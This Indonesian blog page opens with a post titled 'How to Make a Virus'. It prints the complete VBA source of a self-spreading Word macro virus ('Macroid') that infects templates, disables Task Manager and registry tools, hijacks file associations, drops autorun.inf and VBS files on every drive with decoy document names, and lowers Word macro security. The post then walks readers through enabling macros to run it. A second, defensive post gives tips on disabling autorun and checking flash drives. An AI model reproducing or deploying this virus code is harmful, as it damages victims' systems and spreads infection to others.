Tampilkan postingan dengan label Virus. Tampilkan semua postingan
Tampilkan postingan dengan label Virus. Tampilkan semua postingan

Sabtu, 19 November 2011

Cara Membuat Virus

0



BINUS HACKER Binus Hacker Is Not Criminal Banner

Pendahuluan
Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.
Cara Kerja
Virus komputer umumnya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras komputer tetapi dapat mengakibatkan kerusakan dengan cara memuat program yang memaksa over process ke perangkat tertentu. Efek negatif virus komputer adalah memperbanyak dirinya sendiri, yang membuat sumber daya pada komputer (seperti penggunaan memori) menjadi berkurang secara signifikan. Hampir 95% virus komputer berbasis sistem operasi Windows. Sisanya menyerang Linux/GNU, Mac, FreeBSD, OS/2 IBM, dan Sun Operating System. Virus yang ganas akan merusak perangkat keras.
(Baca: ilmu dalam tutorial ini untuk pembelajaran bukan untuk disalahgunakan)
Ini adalah tutorial saya yang kesekian kalinya dan mudah-mudahan tutorial kali ini bermanfaat untuk kalian.
Kali ini saya akan membahas mengenai virus macro… (para virus maker diharap untuk tenang dulu!).
Pasti banyak bertanya kenapa kali ini membahas tentang cara membuat virus? Biasanya kan lebih sering membahas analisis virus atau antivirusnya itu….
Yah kali ini memang agak berbeda. Selain untuk mencari suasana baru, aku juga agak tertantang dengan artikel yang saya buat ini.
Sebelum aku membuat artikel ini, aku sengaja mencari-cari kelemahan dari antivirusku sendiri (baca:Morphost). Ternyata aku lebih tertarik untuk membuat virus macro untuk mencari celah antivirusku itu. Untuk membuat artikel ini memang butuh pengorbanan juga. Soalnya komputerku jadi terinfeksi oleh virusku sendiri. Haaahhh…..

Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.
CARA MEMBUAT VIRUS
  1. Buka Ms.Word (hanya contoh)
  2. buka tools > Macro> Visual Basic Editor

  • Akan muncul gambar di bawah

Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.


Sekarang muncul pertanyaan! Source yang bagaimana yang harus diketik???
Tenang, aku dah siapkan kok sourcenya. Makan neh source code!
‘This is my code’s virus
‘Macro Viruses
‘[Macroid]
‘Hanya untuk pembelajaran
Private Sub Document_Close()
Dim AD, NT As Object
Dim isi As String
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
If AD.Name <> “Macroid” Then
AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines
AD.Name = “Macroid”
isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)
AD.CodeModule.AddFromString isi
ActiveDocument.Save
End If
If NT.Name <> “Macroid” Then
NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines
NT.Name = “Macroid”
isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)
NT.CodeModule.AddFromString isi
NormalTemplate.Save
End If
If InStr(ActiveDocument.Content, “Macroid”) = 0 Then
ActiveDocument.Content = “[Macroid]” & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & “[Macroid] by Morphic” & vbCrLf & “copyright(c) Medan Juli-2008″
End If
On Error Resume Next
Dim b As Object
Set b = CreateObject(“Wscript.Shell”)
b.regwrite “HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title”, “Browser Internet ini diambil alih oleh Macroid”
b.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Macroid”
b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Macroid”
b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “VM-Morphic”
b.regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Macroid-A. Eat this!!! Ha ha ha”
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “2″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1″
b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\”, “Tong Sampah Macroid”
b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\”, “Komputer Morphic”
b.regwrite “HKLM\SOFTWARE\Classes\exefile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\comfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\txtfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\scrfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\batfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shell\”, “0pen”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\”, “&Open”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\command\”, “wscript.exe ” & Environ$(“windir”) & “\avmc.vbs”
b.regwrite “HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
On Error Resume Next
Dim rog As Integer
Dim atr, vbs, Tipu(10), Trik(10) As String
For a = 66 To 90
partisi = Chr$(a)
vbs = partisi & “:\auto.vbs”
atr = partisi & “:\autorun.inf”
Tipu(1) = partisi & “:\Soal SPMB 1995-2008.doc”
Tipu(2) = partisi & “:\Kisah di balik HarryPotter.doc”
Tipu(3) = partisi & “:\Titip File sebentar.doc”
Tipu(4) = partisi & “:\jangan di baca.doc”
Tipu(5) = partisi & “:\buku harian.doc”
Tipu(6) = partisi & “:\cerita hangat.doc”
Tipu(7) = partisi & “:\Punya Baim.doc”
Tipu(8) = partisi & “:\Teka-teki yang baru.doc”
Tipu(9) = partisi & “:\Kumpulan cerita lucu.doc”
Tipu(10) = partisi & “:\Trik Sulap.doc”
If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then
Randomize
rog = Int(10 * Rnd) + 1
Open Tipu(rog) For Output As #1
Print #1, “”
Close #1
End If
Trik(1) = partisi & “:\Novel J.K.Rowling.doc”
Trik(2) = partisi & “:\cerita cinta.doc”
Trik(3) = partisi & “:\Ringkasan cerita HarryPotter.doc”
Trik(4) = partisi & “:\Semua Cheat game DOTA.doc”
Trik(5) = partisi & “:\Kumpulan Cheat game.doc”
Trik(6) = partisi & “:\Cheat game RF.doc”
Trik(7) = partisi & “:\Cheat game Ayo Dance.doc”
Trik(8) = partisi & “:\Goosebumps.doc”
Trik(9) = partisi & “:\FearStreet.doc”
Trik(10) = partisi & “:\R.L.Stine.doc”
If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then
Randomize
rogi = Int(10 * Rnd) + 1
Open Trik(rogi) For Output As #1
Print #1, “”
Close #1
End If
Open atr For Output As #1
Print #1, “[Autorun]“
Print #1, “shell\Open\command=wscript.exe auto.vbs”
Close #1
SetAttr atr, vbHidden + vbSystem
Open vbs For Output As #1
Print #1, “dim a”
Print #1, “set a = createobject(” & Chr(34) & “Wscript.shell” & Chr(34) & “)”
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\10.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\11.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\12.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Close #1
SetAttr vbs, vbHidden + vbSystem
Next a
If Dir(Environ$(“windir”) & “\Macroid.doc”) = “” Then
Dim isicrita As String
isicrita = “[Macroid] by Morphic” & vbCrLf & “Copyright(c) Medan Juli-2008″ & vbCrLf & vbCrLf & _
Chr(34) & “Ms.Word is a thing that can be used as a power to break everything…. ” & Chr(34) & vbCrLf & “(Morphic)”
Open Environ$(“windir”) & “\Macroid.doc” For Output As #1
Print #1, isicrita
Close #1
End If
If Dir(Environ$(“windir”) & “\avmc.vbs”) = “” Then
Open Environ$(“windir”) & “\avmc.vbs” For Output As #1
Print #1, “set fs = createobject(” & Chr(34) & “Scripting.FileSystemObject” & Chr(34) & “)”
Print #1, “for each FD in fs.drives”
Print #1, “if (FD.Drivetype = 1) and FD.Path <> ” & Chr(34) & “A:” & Chr(34) & ” then”
Print #1, “set tf = fs.CreateTextFile(FD.Path” & Chr(38) & Chr(34) & “\Jangan di baca.doc” & Chr(34) & “)”
Print #1, “end if”
Print #1, “Next”
Close #1
End If
ActiveDocument.Save
NormalTemplate.Save
End Sub
Private Sub Document_Open()
CommandBars(“Tools”).Controls(“Macro”).Visible = False
CommandBars(“Tools”).Controls(“Macro”).Enabled = False
CommandBars(“Tools”).Controls(“Customize…”).Visible = False
CommandBars(“Tools”).Controls(“Options…”).Visible = False
Dim AD, NT As Object
Dim isi As String
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
If AD.Name <> “Macroid” Then
AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines
AD.Name = “Macroid”
isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)
AD.CodeModule.AddFromString isi
ActiveDocument.Save
End If
If NT.Name <> “Macroid” Then
NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines
NT.Name = “Macroid”
isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)
NT.CodeModule.AddFromString isi
NormalTemplate.Save
End If
If InStr(ActiveDocument.Content, “Macroid”) = 0 Then
ActiveDocument.Content = “[Macroid]” & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & “[Macroid] by Morphic” & vbCrLf & “copyright(c) Medan Juli-2008″
End If
On Error Resume Next
Dim b As Object
Set b = CreateObject(“Wscript.Shell”)
b.regwrite “HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title”, “Browser Internet ini diambil alih oleh Macroid”
b.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Macroid”
b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Macroid”
b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “VM-Morphic”
b.regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Macroid-A. Eat this!!! Ha ha ha”
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “2″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1″
b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\”, “Tong Sampah Macroid”
b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\”, “Komputer Morphic”
b.regwrite “HKLM\SOFTWARE\Classes\exefile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\comfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\txtfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\scrfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\batfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shell\”, “0pen”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\”, “&Open”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\command\”, “wscript.exe ” & Environ$(“windir”) & “\avmc.vbs”
b.regwrite “HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
On Error Resume Next
Dim rog As Integer
Dim atr, vbs, Tipu(10), Trik(10) As String
For a = 66 To 90
partisi = Chr$(a)
vbs = partisi & “:\auto.vbs”
atr = partisi & “:\autorun.inf”
Tipu(1) = partisi & “:\Soal SPMB 1995-2008.doc”
Tipu(2) = partisi & “:\Kisah di balik HarryPotter.doc”
Tipu(3) = partisi & “:\Titip File sebentar.doc”
Tipu(4) = partisi & “:\jangan di baca.doc”
Tipu(5) = partisi & “:\buku harian.doc”
Tipu(6) = partisi & “:\cerita hangat.doc”
Tipu(7) = partisi & “:\Punya Baim.doc”
Tipu(8) = partisi & “:\Teka-teki yang baru.doc”
Tipu(9) = partisi & “:\Kumpulan cerita lucu.doc”
Tipu(10) = partisi & “:\Trik Sulap.doc”
If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then
Randomize
rog = Int(10 * Rnd) + 1
Open Tipu(rog) For Output As #1
Print #1, “”
Close #1
End If
Trik(1) = partisi & “:\Novel J.K.Rowling.doc”
Trik(2) = partisi & “:\cerita cinta.doc”
Trik(3) = partisi & “:\Ringkasan cerita HarryPotter.doc”
Trik(4) = partisi & “:\Semua Cheat game DOTA.doc”
Trik(5) = partisi & “:\Kumpulan Cheat game.doc”
Trik(6) = partisi & “:\Cheat game RF.doc”
Trik(7) = partisi & “:\Cheat game Ayo Dance.doc”
Trik(8) = partisi & “:\Goosebumps.doc”
Trik(9) = partisi & “:\FearStreet.doc”
Trik(10) = partisi & “:\R.L.Stine.doc”
If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then
Randomize
rogi = Int(10 * Rnd) + 1
Open Trik(rogi) For Output As #1
Print #1, “”
Close #1
End If
Open atr For Output As #1
Print #1, “[Autorun]“
Print #1, “shell\Open\command=wscript.exe auto.vbs”
Close #1
SetAttr atr, vbHidden + vbSystem
Open vbs For Output As #1
Print #1, “dim a”
Print #1, “set a = createobject(” & Chr(34) & “Wscript.shell” & Chr(34) & “)”
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\10.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\11.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\12.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Close #1
SetAttr vbs, vbHidden + vbSystem
Next a
End Sub
Hati –hati dengan source diatas. Karena lumayan bikin pening juga. Tapi maaf ya kalo aku gak bisa jelasinnya sekarang. Karena kalo aku jelasin nanti tutorial ini terlalu panjangggggggggggggggg……. Makanya penjelasan mengenai source di atas aku buat di tutorial kedua.
EFEK-EFEK KECIL DAN TANDA-TANDA TERINFEKSI



Nah coba tebak mana file virus dan mana file yang bukan virus!!!!!!!!
Jawabannya lihat di bawah!!

CARA MEMBUAT VIRUS LANJUTAN
Ini nih, dulu saya udah janji untuk ngelanjutin sample virus macro yang saya buat dulu. Di tutorial kali ini saya akan jelasin sedikit demi sedikit untuk mempelajari virus macro ini…
Pernah dengar virus Macroid? Itu adalah salah satu contoh virus macro yang saya buat.
Langsung aja.
Buka visual Basic editor di Tools>macro>visual basic editor ato tekan pada keyboard Alt+F11
Tampilannya mirip dengan VB6 kita, dan penggunaan sourcenya juga gak jauh beda…
Misalnya :
Dim AD as object
Ya gak. Mirip kan dengan script di VB6? Dan dilanjutkan dengan penggunaan ”set”. Misalnya :
set AD=ActiveDocument.VBProject.VBComponents.Item(1)
ha ha ha… oke deh gak usah main-main. Langsung keserius nya aja…
Script dibawah ini untuk mengubah ”Name” document yang diinfeksi (umumnya ini yang dijadikan sebagai nama virus macro kita)
dim AD as object set AD=ActiveDocument.VBProject.VBComponents.Item(1)
if AD.Name “Macroid” then AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines AD.Name = “Macroid” end if
contoh script diatas adalah untuk mengubah name document menjadi ”Macroid”. (efek ini baru bisa dijalankan setelah virus yang utuh dieksekusi)
Script diatas bisa kamu sisipkan di ”Document_Close()” ato di ”Document_Open()” ato di ”Document_New()”
Kalo disisipkan di “Document_Close()” efeknya akan berjalan saat document ditutup. Dan begitu juga dengan “Document_Open()” dan “Document_new()”
Kalo disisipkan di “Document_Open()” efeknya akan berjalan saat document dibuka.
Kalo disisipkan di “Document_new()” efeknya akan aberjalan saat document baru dibuka.
Ini contoh gambarnya…
image002
Efeknya adalah ini.

Itu tandanya virus “Macroid”!!! ha ha ha… oke.
Sebenarnya saya mau menjelaskan lebih banyak soal trik-trik virus macro, tapi saya yakin sebelum sampai diatas pasti masih banyak masalah untuk kalian…
Sebelumnya kalian harus perhatikan security macro kalian.
Lihat Tools>Macro>security
image006
Yang harus kita pilih adalah opsi ”Low” supaya Ms.Word akan menjalankan semua script di visual Basic Editor. Karena kita masih belajar-belajar biarkan saja kita yang atur security ini, nanti kalo kita udah mau bikin virus macro, ada caranya supaya virus kita yang ngatur security ini… tenang aja…
Setelah kita set securitynya, silakan save document terus hidupkan document kita tadi.
Ada satu lagi masalah… kalo nanti ”misalnya” ada gambar seperti dibawah ini:
image010
Berarti ada hal yang harus kita atur dulu… Buka lagi security macro tadi.
Lalu pada tab Trusted Publishers silakan ceklis “Trust aceess to Visual Basic Project”
Nah klo itu dah dilakukan, maka untuk berikut-berikutnya kalo kita mau ngetes virus macro kita udah bisa boss….
Sekian dulu tutorialnya, tunggu tutorial berikutnya ya….


Gunakan Ilmu yang ada untuk menambah pengetahuan bukan untuk merugikan banyak pihak
            ( izzal ahmad)

sumber artikel : http://www.binushacker.net/cara-membuat-virus.html

Read more

Jumat, 18 November 2011

Tips Hindari Serangan Virus

0






Virus. Nama ini tidaklah asing lagi bagi kita. Tapi bukan virus flu babi lho yang sedang melanda beberapa negara di dunia. Kita ngomongin masalah virus komputer. Mungkin banyak sekali diantara kita yang pernah kena serangan virus. Bikin pusing khan? Komputer jadi lambat, file hilang bahkan yang paling parah sistem Windows yang rusak. Kalau uda gini mesti install ulang lagi.

Nah, agar komputer kita ga kena virus lagi atau ga gampang kena virus. Ada baiknya kita mencegahnya masuk ke sistem komputer kita. Emang sie ada beberapa dari kita yang punya antivirus yang handal. Tapi itu bukan jaminan komputer kita ga akan kena virus. Sehandal apapun antivirus, jika ga pernah diupdate sama saja ga bisa ngenalin virus baru. Selain itu, biarpun kita uda rajin update jika ada varian virus yang sangat-sangat baru bisa aja komputer kita kena virus. Lagian ga ada salahnya kan kita mencegah dari pada mengobati?

Oleh karena itu, ada baiknya kita tahu cara kerja virus agar kita bisa mencegah virus masuk ke sistem komputer kita. Selain menginstal Antivurs pada komputer dan melakukan scan virus terlebih dahulu sebelum mengakses file pada removeable drive, ada beberapa cara mencegah virus agar tidak bisa menginfeksi komputer kita, yaitu:

1. Matikan Fitur Autorun

Windows secara default memberikan mengaktifkan fitur autorun-nya. Jadi jika kita memasukkan removable disk seperti CD, DVD, Flashdisk dan lainnya maka windows akan memberikan kita pilihan atas removable drive tersebut. Entah memutar file multimedia yang ada drive tersebut atau membukanya di windows explorer. Fitur ini sedikit memberikan kemudahan pada kita, yaitu kita ga usah membuka aplikasi lagi misalnya Winamp untuk membuka file mp3 yang ada pada flash disk kita. Atau membuka explorer lagi untuk melihat isi flashdisk kita. Karena dengan hanya mengklik pilihan dan menekan tombol OK maka apa yang kita ingin lakukan pada file dalam flashdisk tersebut sudah cukup.

Tetapi fitur inilah yang sering dimanfaatkan oleh para virus maker (istilah kerennya pembuat virus) untuk menyebarkan virus buatan mereka. Caranya mereka akan membuat sebuah file bernama autorun.inf yang akan menjalankan file virus secara otomatis jika flashdisk kita colokkan pada komputer. Jadi, tanpa didouble klik pun file virus tersebut sudah berjalan.

Agar hal ini tidak terjadi, maka perlu kiranya kita menonaktifkan fitur autorun tersebut. Memang sih kita kehilangan fitur yang memudahkan kita. Tapi saya rasa sepadan dengan keamanan yang kita peroleh. Untuk menonkatifkan fitur autorun, ada beberapa langkah yang mesti kita lakukan yaitu:

    Klik tombol start kemudian klik run. Pada kotak dialog run ketik “gpedit.msc” (tanpa tanda kutip) dan tekan enter.



    Setelah jendela Group Policy muncul, pada bagian User Configuration pilih Administrative Template, kemudian klik pada node System.



    Pada jendela bagian kanan double klik Turn Off Autoplay seperti gambar di bawah.



    Pada jendela Turn off Autoplay properties yang muncul pada tab Setting tandai pilihan Enabe.

    Setelah itu, pada pilihan Turn off autopaly on pilihlah All Drives agar fitur autoplay pada semua removable drive tidak diaktifkan.

    Terakhir klik tombol OK dan tutup jendela Group Policy.



Sekarang cobalah masukkan Falshdisk atau CD Anda, apakah jendela autoplay masih muncul? Jika tidak, berarti fitur autoplay sudah tidak aktif. Jika masih muncul berarti ada yang salah dengan seting tadi. Coba ulangi langkah-langkah di atas.

2. Periksa flash disk

Flashdisk merupakan media yang paling sering digunakan sebagi media penyebaran virus. Maka sebelum mengakses file yang ada di dalam flashdisk ada baiknya scanlah flashdisk Anda dengan Antivirus yang ada pada komputer jika sempat dipergunakan pada komputer teman, komputer kantor atau komputer lainnya. Jika Antivirus tidak menemukan virus di dalamnya bukan berarti aman. Kenapa? Karena mungkin saja virus varian baru yang belum dikenali antivirus sudah ada di flashdisk Anda. Cara mengetahuinya adalah dengan memeriksa flash disk Anda apakah ada sebuah file yang bernama autorun.inf. Mengapa autorun.inf? Karena virus yang banyak beredar sekarang memanfaatkan file ini dalam penyebarannya seperti yang telah saya bahas diatas. Sebelumnya, setlah agar Windows menampilkan file yang beratribut hidden dan system. Kenapa mesti begitu? Karena umunya virus akan menset file autorun.inf dan file virusnya dengan atribut hidden dan system. Jadi jika dalam setingan default Windows kita tidak akan melihat file tersebut. Cara menampilkan file beratribut hidden dan system adalah dengan memilih menu Tools kemudian Folder Options pada jendela Windows Explorer.



Setelah jendela Folder Options muncul, tandai pilihan “Show hidden files and folder” dan hilangkan tanda centang pada pilihan “Hide protected operating system files (Recommended)”.



Setelah itu klik OK. Jika file autorun.inf ini ada pada flashdisk tanpa Anda pernah membuatnya atau sebelumnya tidak pernah ada, kemungkinan besar sebuah virus telah mengcopy dirinya ke flashdisk Anda.

Agar kita tahu yang mana file virus tersebut, bukalah file autorun.inf tersebut. Biasanya secara default windows akan membukanya dengan program Notepad. Jangan takut, ini bukan file virusnya lho. File ini merupakan pemicu agar virus berjalan otomatis jika flashdisk dicolokkan ke komputer. Setelah file tersebut dibuka dengan notepad, carilah kata “open” (tanpa tanda kutip). Jika ketemu, setelah kata “open” tersebut biasanya diikuti dengan tanda “=” dan beberapa kata dibelakangnya. Seperti gambar dibawah.



Nah kata virus.exe inilah yang merupakan file virus tersebut. Carilah file tersebut di flashdisk Anda. Jika tidak ketemu, gunakan fungsi Search pada Windows Explorer. Ingat tandai pilihan “Search hidden files and folders” pada More Advanced Options.



Jika file tersebut ketemu, segeralah hapus. Jika ada peringatan bahwa file tersebut adalah file system lanjutkan saja dengan mengklik yes. Ada baiknya file autorun.inf juga dihapus. Agar jika dikemudian hari ada virus yang mengcopy dirinya ke flashdisk Anda dan menempatkan file autorun.inf Anda bisa dengan cepat mengetahuinya.

Catatan:

Ada beberapa produsen flashdisk yang memberikan aplikasi pada flashdisk mereka yang biasanya memanfaatkan file autorun.inf agar aplikasi tersebut berjalan secara automatis. Usahakan Anda mengetahui hal ini dan file apa yang dijalakan autorun.inf tersebut. Agar Anda tidak salah dan menganggapnya virus kemudian menghapusnya.

3. Hilangkan kebiasaan asal double klik


Salah satu penyebab komputer kita bisa terserang virus adalah karena kekurang telitian kita sendiri yaitu kita sering kali kurang teliti dalam membuka file atau folder yang ada pada Flashdisk kita dengan melakukan double klik atau tekan enter pada keyboard.

Mengapa hal ini menyebabkan virus bisa menginfeksi system kita? Padahal 2 langkah diatas telah dilakukan. Mungkin Anda akan bertanya seperti itu? Hal ini perlu kita perhatikan karena mungkin saja sebuah virus memang sengaja membuat file autorun.inf pada flashdisk agar user tidak curiga. Dia memanfaatkan kecerobihan user yang tidak sengaja menjalankan dirinya dengan mendouble klik file virus tersebut.

Mengapa hal ini bisa terjadi? Karena sekarang ini banyak sekali virus yang mempunyai icon seperti folder, word dokumen, mp3 atau file yang kebanyak pemakai komputer miliki. Dan biasanya virus akan menamakan dirinya mirip dengan folder atau file yang ada di flashdisk kita sesuai dengan icon dirinya dan menyembunyikan folder atau file yang asli dengan menset atributnya menjadi hidden. Misalkan jika virus tersebut bericon seperti folder maka dia akan mengcopy dirinya dengan nama-nama folder yang ada flashdisk dan menyembunyikan atau bahkan menghapus folder yang asli.
Ada beberapa hal yang perlu kita perhatikan untuk mencegah hal tersebut terjadi antara lain:

    Jika Anda ingin membuka sebuah folder pada flashdisk, usahakan tidak melakukan double klik pada folder tersebut. Karena jika ada virus bericon menyerupai folder yang Anda double klik maka virus tersebut pasti akan menyebar pada komputer. Trus gimana bisa melihat isi folder tersebut? Caranya kliklah folder yang ada pada tree view yang ada disebelah kiri jendela explorer maka isi dari folder akan terlihat pada jendela sebelah kanan explorer. Jika tree view tersebut tidak ada pada jendela explorer Anda, kliklah tombol Folder yang ada pada Toolbar windows explorer maka tree view akan mucul. Jika memang sebuah folder maka akan kelihatan pada tree view tersebut.


